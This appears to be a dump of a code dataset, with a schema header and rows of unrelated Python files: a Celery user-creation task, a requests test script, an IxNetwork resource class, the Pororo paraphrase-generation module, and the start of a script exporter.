blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
64d3ee1b2b63bf47956a16eb239dd218474a9fad | 1a55572a16c3e34c72630043af7ab3d05bafae8c | /Celery/celery_with_django/mysite/core/tasks.py | 877830411a479b583d31addcbbe10ff041244a19 | [] | no_license | Wald-K/Technologies | 1e2720a05083ba24da3d1761088d0cab4a6e9658 | 8cc2b27fbe5e6c860342fd46b251680899d111bb | refs/heads/master | 2023-01-12T14:11:29.204133 | 2021-01-25T21:54:45 | 2021-01-25T21:54:45 | 196,719,173 | 0 | 0 | null | 2023-01-07T20:03:47 | 2019-07-13T12:28:18 | Python | UTF-8 | Python | false | false | 581 | py | import string
import time
from django.contrib.auth.models import User
from django.utils.crypto import get_random_string
from celery import shared_task
@shared_task
def create_random_user_accounts(total):
    """Celery task: create `total` Django users with random credentials.

    Each iteration builds a random username, derives the e-mail address from
    it, generates a random password, persists the user, then sleeps so the
    task visibly takes time (demo of a long-running background job).

    Args:
        total (int): number of user accounts to create.

    Returns:
        str: human-readable success message.
    """
    for _ in range(total):
        name = 'user_{}'.format(get_random_string(10, string.ascii_letters))
        User.objects.create_user(
            username=name,
            email='{}@example.com'.format(name),
            password=get_random_string(50),
        )
        # Artificial delay between creations (keeps the task long-running).
        time.sleep(10)
    return '{} random users created with success'.format(total)
| [
"[email protected]"
] | |
0e8291c913d42d6d47aa129d4403133d044afa4f | ac216a2cc36f91625e440247986ead2cd8cce350 | /go/src/infra/tools/vpython/testdata/test_requests_get.py | f36999bde734744de8ae72fa434816c8ed2cfa45 | [
"BSD-3-Clause"
] | permissive | xinghun61/infra | b77cdc566d9a63c5d97f9e30e8d589982b1678ab | b5d4783f99461438ca9e6a477535617fadab6ba3 | refs/heads/master | 2023-01-12T21:36:49.360274 | 2019-10-01T18:09:22 | 2019-10-01T18:09:22 | 212,168,656 | 2 | 1 | BSD-3-Clause | 2023-01-07T10:18:03 | 2019-10-01T18:22:44 | Python | UTF-8 | Python | false | false | 544 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cryptography
import requests
SITE = 'https://www.google.com'
print 'Using requests version:', requests.__version__
print 'Using cryptography version:', cryptography.__version__
print 'Testing requests from:', SITE
r = requests.get(SITE)
print 'Status Code:', r.status_code
if len(r.text) == 0:
print 'Content length is zero!'
else:
print 'Content length is non-zero.'
| [
"[email protected]"
] | |
e0190ff61f2aabbb5624403696f355f6c20c9987 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_unifies.py | 6a571fbebcd0b1f1afa793ee61d08959b4764e46 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
from xai.brain.wordbase.verbs._unify import _UNIFY
# class header
class _UNIFIES(_UNIFY, ):
    """Inflected word-form "unifies"; inherits all behaviour from _UNIFY."""

    def __init__(self,):
        # Initialise the base form first, then override the form-specific fields.
        _UNIFY.__init__(self)
        self.jsondata = {}
        self.basic = "unify"
        self.specie = 'verbs'
        self.name = "UNIFIES"
| [
"[email protected]"
] | |
80c9278d853e0dae42d1405cbe2fdc3c938b0df3 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/dcemulticastmacrange_cc6bbd6d9c9c0e88f6e630afd3a84823.py | 09fd8e288e4cbb7a1e6c8a322287c74d41fefd37 | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,198 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
# NOTE: auto-generated ixnetwork_restpy resource class — property getters/setters
# are thin wrappers over Base._get_attribute/_set_attribute keyed by _SDM_ATT_MAP.
class DceMulticastMacRange(Base):
    """Sets the Multicast MAC Range for the DCE ISIS router.
    The DceMulticastMacRange class encapsulates a list of dceMulticastMacRange resources that are managed by the user.
    A list of resources can be retrieved from the server using the DceMulticastMacRange.find() method.
    The list can be managed by using the DceMulticastMacRange.add() and DceMulticastMacRange.remove() methods.
    """
    __slots__ = ()
    # REST/SDM resource name for this class.
    _SDM_NAME = 'dceMulticastMacRange'
    # Maps the Python attribute names to the server-side (SDM) attribute names.
    _SDM_ATT_MAP = {
        'Enabled': 'enabled',
        'InterGroupUnicastMacIncrement': 'interGroupUnicastMacIncrement',
        'IntraGroupUnicastMacIncrement': 'intraGroupUnicastMacIncrement',
        'MulticastMacCount': 'multicastMacCount',
        'MulticastMacStep': 'multicastMacStep',
        'SourceGroupMapping': 'sourceGroupMapping',
        'StartMulticastMac': 'startMulticastMac',
        'StartUnicastSourceMac': 'startUnicastSourceMac',
        'Topology': 'topology',
        'UnicastSourcesPerMulticastMac': 'unicastSourcesPerMulticastMac',
        'VlanId': 'vlanId',
    }
    # Allowed values for enum-typed attributes.
    _SDM_ENUM_MAP = {
        'sourceGroupMapping': ['fullyMeshed', 'oneToOne', 'manualMapping'],
    }
    def __init__(self, parent, list_op=False):
        # parent: owning resource node; list_op: True when built as part of a list operation.
        super(DceMulticastMacRange, self).__init__(parent, list_op)
    @property
    def Enabled(self):
        # type: () -> bool
        """
        Returns
        -------
        - bool: If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
        """
        return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
    @Enabled.setter
    def Enabled(self, value):
        # type: (bool) -> None
        self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
    @property
    def InterGroupUnicastMacIncrement(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
        """
        return self._get_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'])
    @InterGroupUnicastMacIncrement.setter
    def InterGroupUnicastMacIncrement(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'], value)
    @property
    def IntraGroupUnicastMacIncrement(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
        """
        return self._get_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'])
    @IntraGroupUnicastMacIncrement.setter
    def IntraGroupUnicastMacIncrement(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'], value)
    @property
    def MulticastMacCount(self):
        # type: () -> int
        """
        Returns
        -------
        - number: The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
        """
        return self._get_attribute(self._SDM_ATT_MAP['MulticastMacCount'])
    @MulticastMacCount.setter
    def MulticastMacCount(self, value):
        # type: (int) -> None
        self._set_attribute(self._SDM_ATT_MAP['MulticastMacCount'], value)
    @property
    def MulticastMacStep(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
        """
        return self._get_attribute(self._SDM_ATT_MAP['MulticastMacStep'])
    @MulticastMacStep.setter
    def MulticastMacStep(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['MulticastMacStep'], value)
    @property
    def SourceGroupMapping(self):
        # type: () -> str
        """
        Returns
        -------
        - str(fullyMeshed | oneToOne | manualMapping): The Source Group mapping type.
        """
        return self._get_attribute(self._SDM_ATT_MAP['SourceGroupMapping'])
    @SourceGroupMapping.setter
    def SourceGroupMapping(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['SourceGroupMapping'], value)
    @property
    def StartMulticastMac(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
        """
        return self._get_attribute(self._SDM_ATT_MAP['StartMulticastMac'])
    @StartMulticastMac.setter
    def StartMulticastMac(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['StartMulticastMac'], value)
    @property
    def StartUnicastSourceMac(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
        """
        return self._get_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'])
    @StartUnicastSourceMac.setter
    def StartUnicastSourceMac(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'], value)
    @property
    def Topology(self):
        # type: () -> int
        """
        Returns
        -------
        - number: The topology identifier to which the corresponding MAC belongs.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Topology'])
    @Topology.setter
    def Topology(self, value):
        # type: (int) -> None
        self._set_attribute(self._SDM_ATT_MAP['Topology'], value)
    @property
    def UnicastSourcesPerMulticastMac(self):
        # type: () -> int
        """
        Returns
        -------
        - number: The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
        """
        return self._get_attribute(self._SDM_ATT_MAP['UnicastSourcesPerMulticastMac'])
    @UnicastSourcesPerMulticastMac.setter
    def UnicastSourcesPerMulticastMac(self, value):
        # type: (int) -> None
        self._set_attribute(self._SDM_ATT_MAP['UnicastSourcesPerMulticastMac'], value)
    @property
    def VlanId(self):
        # type: () -> int
        """
        Returns
        -------
        - number: The VLAN ID of the enabled Multicast MAC Range. (default = 1)
        """
        return self._get_attribute(self._SDM_ATT_MAP['VlanId'])
    @VlanId.setter
    def VlanId(self, value):
        # type: (int) -> None
        self._set_attribute(self._SDM_ATT_MAP['VlanId'], value)
    # CRUD helpers below delegate to Base; _map_locals filters out unset (None) kwargs.
    def update(self, Enabled=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastMacCount=None, MulticastMacStep=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, Topology=None, UnicastSourcesPerMulticastMac=None, VlanId=None):
        # type: (bool, str, str, int, str, str, str, str, int, int, int) -> DceMulticastMacRange
        """Updates dceMulticastMacRange resource on the server.
        Args
        ----
        - Enabled (bool): If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
        - InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
        - IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
        - MulticastMacCount (number): The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
        - MulticastMacStep (str): The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
        - SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
        - StartMulticastMac (str): The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
        - StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
        - Topology (number): The topology identifier to which the corresponding MAC belongs.
        - UnicastSourcesPerMulticastMac (number): The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
        - VlanId (number): The VLAN ID of the enabled Multicast MAC Range. (default = 1)
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
    def add(self, Enabled=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastMacCount=None, MulticastMacStep=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, Topology=None, UnicastSourcesPerMulticastMac=None, VlanId=None):
        # type: (bool, str, str, int, str, str, str, str, int, int, int) -> DceMulticastMacRange
        """Adds a new dceMulticastMacRange resource on the server and adds it to the container.
        Args
        ----
        - Enabled (bool): If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
        - InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
        - IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
        - MulticastMacCount (number): The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
        - MulticastMacStep (str): The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
        - SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
        - StartMulticastMac (str): The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
        - StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
        - Topology (number): The topology identifier to which the corresponding MAC belongs.
        - UnicastSourcesPerMulticastMac (number): The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
        - VlanId (number): The VLAN ID of the enabled Multicast MAC Range. (default = 1)
        Returns
        -------
        - self: This instance with all currently retrieved dceMulticastMacRange resources using find and the newly added dceMulticastMacRange resources available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
    def remove(self):
        """Deletes all the contained dceMulticastMacRange resources in this instance from the server.
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        self._delete()
    def find(self, Enabled=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastMacCount=None, MulticastMacStep=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, Topology=None, UnicastSourcesPerMulticastMac=None, VlanId=None):
        # type: (bool, str, str, int, str, str, str, str, int, int, int) -> DceMulticastMacRange
        """Finds and retrieves dceMulticastMacRange resources from the server.
        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dceMulticastMacRange resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all dceMulticastMacRange resources from the server.
        Args
        ----
        - Enabled (bool): If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
        - InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
        - IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
        - MulticastMacCount (number): The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
        - MulticastMacStep (str): The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
        - SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
        - StartMulticastMac (str): The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
        - StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
        - Topology (number): The topology identifier to which the corresponding MAC belongs.
        - UnicastSourcesPerMulticastMac (number): The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
        - VlanId (number): The VLAN ID of the enabled Multicast MAC Range. (default = 1)
        Returns
        -------
        - self: This instance with matching dceMulticastMacRange resources retrieved from the server available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
    def read(self, href):
        """Retrieves a single instance of dceMulticastMacRange data from the server.
        Args
        ----
        - href (str): An href to the instance to be retrieved
        Returns
        -------
        - self: This instance with the dceMulticastMacRange resources from the server available through an iterator or index
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
| [
"[email protected]"
] | |
5227f9d6b5eb4371104a5de1424d2bec42568366 | 59beef06efb305f1b39e85cfdfb69221241ff9df | /pororo/tasks/paraphrase_generation.py | 2225891c0cd3ddef948906807b8e8bda4a265419 | [
"Apache-2.0",
"BSD-3-Clause",
"HPND",
"MIT",
"ISC",
"Python-2.0",
"Unlicense",
"LicenseRef-scancode-secret-labs-2011",
"BSD-2-Clause"
] | permissive | saimishra/pororo | 747bb506f92b35a9da7e18f43e20d4954db5d985 | 1f61b331d07c22fb9e8ee051a5f6c0c91ae67062 | refs/heads/master | 2023-02-28T09:06:24.492863 | 2021-02-03T08:19:25 | 2021-02-03T08:19:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,253 | py | """Paraphrase Generation modeling class"""
from typing import Optional
from pororo.tasks.utils.base import PororoFactoryBase, PororoGenerationBase
from pororo.tasks.utils.download_utils import download_or_load
class PororoParaphraseFactory(PororoFactoryBase):
    """
    paraphrase generation using Transformer Seq2Seq
    Multi (`transformer.large.multi.mtpg`)
    - dataset: Internal data
    - metric: BLEU score
    +----------+------------+
    | Language | BLEU score |
    +==========+============+
    | Average | 33.00 |
    +----------+------------+
    | English | 54 |
    +----------+------------+
    | Korean | 50 |
    +----------+------------+
    | Japanese | 20 |
    +----------+------------+
    | Chinese | 8 |
    +----------+------------+
    Multi (`transformer.large.multi.fast.mtpg`)
    - dataset: Internal data
    - metric: BLEU score
    +----------+------------+
    | Language | BLEU score |
    +==========+============+
    | Average | 33.50 |
    +----------+------------+
    | English | 56 |
    +----------+------------+
    | Korean | 50 |
    +----------+------------+
    | Japanese | 20 |
    +----------+------------+
    | Chinese | 8 |
    +----------+------------+
    Args:
        text (str): input sentence to be paraphrase generated
        beam (int): beam search size
        temperature (float): temperature scale
        top_k (int): top-K sampling vocabulary size
        top_p (float): top-p sampling ratio
        no_repeat_ngram_size (int): no repeat ngram size
        len_penalty (float): length penalty ratio
    Returns:
        str: generated paraphrase
    Examples:
        >>> pg = Pororo(task="pg", lang="ko")
        >>> pg("노는게 제일 좋아. 친구들 모여라. 언제나 즐거워.")
        노는 것이 가장 좋습니다. 친구들끼리 모여 주세요. 언제나 즐거운 시간 되세요.
        >>> pg = Pororo("pg", lang="zh")
        >>> pg("我喜欢足球") # "I like soccer"
        '我喜欢球球球' # "I like balls"
        >>> pg = Pororo(task="pg", lang="ja")
        >>> pg("雨の日を聞く良い音楽をお勧めしてくれ。") # "Recommend me good music to listen to on rainy days"
        '雨の日を聞くいい音楽を教えてください。' # "Please tell me good music to listen to on rainy days"
        >>> pg = Pororo("pg", lang="en")
        >>> pg("There is someone at the door.")
        "Someone's at the door."
        >>> pg("I'm good, but thanks for the offer.")
        "I'm fine, but thanks for the deal."
    """
    def __init__(self, task: str, lang: str, model: Optional[str]):
        super().__init__(task, lang, model)
    @staticmethod
    def get_available_langs():
        # Languages supported by at least one paraphrase model.
        return ["en", "ko", "zh", "ja"]
    @staticmethod
    def get_available_models():
        # Per-language model identifiers; "multi" models share one multilingual checkpoint.
        return {
            "en": [
                "transformer.large.multi.mtpg",
                "transformer.large.multi.fast.mtpg",
                "transformer.base.en.pg",
            ],
            "ko": [
                "transformer.large.multi.mtpg",
                "transformer.large.multi.fast.mtpg",
                "transformer.base.ko.pg_long",
                "transformer.base.ko.pg",
            ],
            "zh": [
                "transformer.large.multi.mtpg",
                "transformer.large.multi.fast.mtpg",
                "transformer.base.zh.pg",
            ],
            "ja": [
                "transformer.large.multi.mtpg",
                "transformer.large.multi.fast.mtpg",
                "transformer.base.ja.pg",
            ],
        }
    def load(self, device: str):
        """
        Load user-selected task-specific model
        Args:
            device (str): device information
        Returns:
            object: User-selected task-specific model
        """
        # Multilingual checkpoint: one model + BPE tokenizer shared across languages.
        if "multi" in self.config.n_model:
            from fairseq.models.transformer import TransformerModel
            from pororo.tasks.utils.tokenizer import CustomTokenizer
            load_dict = download_or_load(
                f"transformer/{self.config.n_model}",
                "multi",
            )
            model = (TransformerModel.from_pretrained(
                model_name_or_path=load_dict.path,
                checkpoint_file=f"{self.config.n_model}.pt",
                data_name_or_path=load_dict.dict_path,
                source_lang=load_dict.src_dict,
                target_lang=load_dict.tgt_dict,
            ).eval().to(device))
            tokenizer = CustomTokenizer.from_file(
                vocab_filename=f"{load_dict.src_tok}/vocab.json",
                merges_filename=f"{load_dict.src_tok}/merges.txt",
            )
            return PororoTransformerTransMulti(
                model,
                self.config,
                tokenizer,
            )
        # Monolingual checkpoint; Chinese models run without a subword tokenizer
        # (character-level preprocessing is done in the wrapper instead).
        if "transformer" in self.config.n_model:
            from fairseq.models.transformer import TransformerModel
            load_dict = download_or_load(
                f"transformer/{self.config.n_model}",
                self.config.lang,
            )
            tokenizer = None
            model = (TransformerModel.from_pretrained(
                model_name_or_path=load_dict.path,
                checkpoint_file=f"{self.config.n_model}.pt",
                data_name_or_path=load_dict.dict_path,
                source_lang=load_dict.src_dict,
                target_lang=load_dict.tgt_dict,
            ).eval().to(device))
            if self.config.lang != "zh":
                from pororo.tasks.utils.tokenizer import CustomTokenizer
                tokenizer = CustomTokenizer.from_file(
                    vocab_filename=f"{load_dict.src_tok}/vocab.json",
                    merges_filename=f"{load_dict.src_tok}/merges.txt",
                )
            return PororoTransformerParaphrase(model, self.config, tokenizer)
class PororoTransformerTransMulti(PororoGenerationBase):
    """Paraphrase wrapper around a multilingual fairseq TransformerModel.

    Inputs are wrapped in language tokens (same language on both sides, so the
    "translation" acts as a paraphrase) and decoded via model.translate().
    """
    def __init__(self, model, config, tokenizer):
        super().__init__(config)
        self._model = model          # fairseq TransformerModel hub interface
        self._tokenizer = tokenizer  # BPE tokenizer (used for English segmentation)
        # Language-code suffixes used to build fairseq multilingual language tokens.
        self._mapping = {"en": "_XX", "ja": "_XX", "ko": "_KR", "zh": "_CN"}
    def _langtok(self, lang: str):
        """
        Build the bracketed language token understood by the multilingual model.
        Args:
            lang (str): language code
        See Also:
            https://github.com/pytorch/fairseq/blob/master/fairseq/data/multilingual/multilingual_utils.py#L34
        """
        return f"[{lang + self._mapping[lang]}]"
    def _preprocess(self, text: str) -> str:
        """
        Preprocess non-chinese input sentence to replace whitespace token with whitespace
        Args:
            text (str): non-chinese sentence
        Returns:
            str: preprocessed non-chinese sentence
        """
        if self.config.lang == "en":
            # English: subword-segment with the BPE tokenizer.
            pieces = " ".join(self._tokenizer.segment(text.strip()))
        else:
            # Other languages: character-level split, spaces become the "▁" marker.
            pieces = " ".join([c if c != " " else "▁" for c in text.strip()])
        return f"{self._langtok(self.config.lang)} {pieces} {self._langtok(self.config.lang)}"
    def _postprocess(self, output: str) -> str:
        """
        Postprocess output sentence to replace whitespace
        Args:
            output (str): output sentence generated by model
        Returns:
            str: postprocessed output sentence
        """
        # Undo character-level spacing, then turn "▁" markers back into spaces.
        return output.replace(" ", "").replace("▁", " ").strip()
    def predict(
        self,
        text: str,
        beam: int = 5,
        temperature: float = 1.0,
        top_k: int = -1,
        top_p: float = -1,
        no_repeat_ngram_size: int = 4,
        len_penalty: float = 1.0,
    ) -> str:
        """
        Conduct machine translation
        Args:
            text (str): input sentence to be paraphrase generated
            beam (int): beam search size
            temperature (float): temperature scale
            top_k (int): top-K sampling vocabulary size
            top_p (float): top-p sampling ratio
            no_repeat_ngram_size (int): no repeat ngram size
            len_penalty (float): length penalty ratio
        Returns:
            str: machine translated sentence
        """
        text = self._preprocess(text)
        # Switch from beam search to sampling if either sampling knob is set.
        sampling = False
        if top_k != -1 or top_p != -1:
            sampling = True
        output = self._model.translate(
            text,
            beam=beam,
            sampling=sampling,
            temperature=temperature,
            sampling_topk=top_k,
            sampling_topp=top_p,
            max_len_a=1,
            max_len_b=50,
            no_repeat_ngram_size=no_repeat_ngram_size,
            lenpen=len_penalty,
        )
        output = self._postprocess(output)
        return output
    def __call__(
        self,
        text: str,
        beam: int = 5,
        temperature: float = 1.0,
        top_k: int = -1,
        top_p: float = -1,
        no_repeat_ngram_size: int = 4,
        len_penalty: float = 1.0,
    ):
        # Validate input type before delegating to predict().
        assert isinstance(text, str), "Input text should be string type"
        return self.predict(
            text,
            beam,
            temperature,
            top_k,
            top_p,
            no_repeat_ngram_size,
            len_penalty,
        )
class PororoTransformerParaphrase(PororoGenerationBase):
    """Paraphrase wrapper around a monolingual fairseq TransformerModel.

    A tokenizer is used for segmentation when available; Chinese models are
    loaded without one and use character-level preprocessing instead.
    """
    def __init__(self, model, config, tokenizer):
        super().__init__(config)
        self._model = model          # fairseq TransformerModel hub interface
        self._tokenizer = tokenizer  # BPE tokenizer, or None for Chinese
    def _preprocess(self, text: str):
        """
        Preprocess non-chinese input sentence to replace whitespace token with whitespace
        Args:
            text (str): non-chinese sentence
        Returns:
            str: preprocessed non-chinese sentence
        """
        pieces = self._tokenizer.segment(text.strip())
        return " ".join(pieces)
    def _zh_preprocess(self, text: str):
        """
        Preprocess chinese input sentence to replace whitespace token with whitespace
        Args:
            text (str): chinese sentence
        Returns:
            str: preprocessed chinese sentence
        """
        # Character-level split for Chinese (no subword tokenizer available).
        return " ".join(char for char in text)
    def _postprocess(self, output: str):
        """
        Postprocess output sentence to replace whitespace
        Args:
            output (str): output sentence generated by model
        Returns:
            str: postprocessed output sentence
        """
        # Undo segmentation spacing, then turn "▁" markers back into spaces.
        return output.replace(" ", "").replace("▁", " ").strip()
    def predict(
        self,
        text: str,
        beam: int = 1,
        temperature: float = 1.0,
        top_k: int = -1,
        top_p: float = -1,
        no_repeat_ngram_size: int = 4,
        len_penalty: float = 1.0,
    ):
        """
        Conduct paraphrase generation using Transformer Seq2Seq
        Args:
            text (str): input sentence to be paraphrase generated
            beam (int): beam search size
            temperature (float): temperature scale
            top_k (int): top-K sampling vocabulary size
            top_p (float): top-p sampling ratio
            no_repeat_ngram_size (int): no repeat ngram size
            len_penalty (float): length penalty ratio
        Returns:
            str: generated paraphrase
        """
        # Switch from beam search to sampling if either sampling knob is set.
        sampling = False
        if top_k != -1 or top_p != -1:
            sampling = True
        if self._tokenizer is not None:
            text = self._preprocess(text)
        else:
            text = self._zh_preprocess(text)
        output = self._model.translate(
            text,
            beam=beam,
            sampling=sampling,
            temperature=temperature,
            sampling_topk=top_k,
            sampling_topp=top_p,
            max_len_a=1,
            max_len_b=50,
            no_repeat_ngram_size=no_repeat_ngram_size,
            lenpen=len_penalty,
        )
        output = self._postprocess(output)
        return output
| [
"[email protected]"
] | |
1b3221ba8ff6401dc3e95db960e66b8d4d2943ec | 17ca4c286c70277c626735bb7959e0fc08a8be1f | /start/editor/ActivityScriptExporter.py | 095c1f94a0c806a8992183245073dbbc2e0a3880 | [] | no_license | huazhicai/kidney | 6edae18eee63a8f71cb6cde3a070526192ecdcf1 | 87ec2bcc5929e641870ec89e08fbe1177748434e | refs/heads/master | 2022-11-10T20:59:42.970794 | 2020-04-29T01:39:09 | 2020-04-29T01:39:09 | 200,326,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,143 | py | # coding: utf-8
import os
import math
import csv
import re
import traceback
"""
NOTE: 预存数据的runTimeData仅支持以下几种类型
1. String -> string
2. Float -> float
3. Int -> int
4. None -> None
5. Vec3 -> (a, b, c) -> math3d.vector
这里使用tuple表示Vec3, 故tuple数据类型被占用
"""
# TODO: 数据校验
# TODO: const function 内敛
# TODO: Vec3
CLIENT_SCRIPT = "client"
SERVER_SCRIPT = "server"
